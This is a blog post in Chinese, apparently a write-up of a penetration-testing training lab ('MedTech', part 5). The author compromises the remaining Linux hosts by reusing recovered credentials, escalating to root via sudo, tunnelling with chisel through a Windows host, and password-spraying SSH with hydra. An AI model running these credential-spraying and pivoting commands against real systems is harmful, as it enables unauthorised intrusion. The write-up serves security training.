Challenge 1 - Medtech(5)
Challenge 1 - Medtech(5)
上一階段完成了 MedTech 這個 LAB 的所有 Windows 主機
剩下兩台 Linux 主機,一台在外網一台在內網
先將目標放在外網這一台 Linux 主機(.120)
這一台之前枚舉過僅有 22,80 Port,80 是一個 PAW 站台且找不到洞進去
現階段將目標放到 22 Port,拿到了不少的帳號密碼,進行密碼噴灑後一樣沒有結果
所以將目標放到已經打下來的 Windows 機器上查找看看有無新發現
在 DC01 伺服器 Administrator 的桌面有發現一個檔案 credentials.txr
內容發現一組帳號密碼 web01: offsec/century62hisan51
這組帳號密碼測試後發現可以登入 .120
└─$ hydra -l offsec -p century62hisan51 ssh://192.168.185.120
ssh offsec@192.168.185.120 直接進去了,whoami & id 不是管理者也沒有 local.txt
開始 PE,cat /etc/passwd
sudo -l 發現可以執行所有指令,直接 su 後輸入 offsec 密碼變更為 root,拿取 flag
更新攻擊列表,剩下最後一台內網的 Linux 主機
透過 .121 將 kali 的 2222 Port 對應到 172.16.185.14 的 22 Port
wmic process call create "C:\users\joe\desktop\chisel.exe client 192.168.45.188:8080 R:2222:172.16.185.14:22"
開始密碼噴灑測試,└─$ hydra -L ./usernames.txt -P ./passwords.txt ssh://127.0.0.1 -s 2222 -V
之前在外部 Linux 主機 (.122) 有發現一組 mario 的 id_rsa
測試後發現可以直接登入到內網的 .14 Linux 主機
└─$ proxychains4 -q ssh -i id_rsa_mario mario@172.16.185.14
雖然目前的 mario 不是 root 但是 LAB 在輸入 local.txt 後 flag 收集滿了
意味著這一台應該是不用 PE 可以直接結束這整個 LAB 了
留言
張貼留言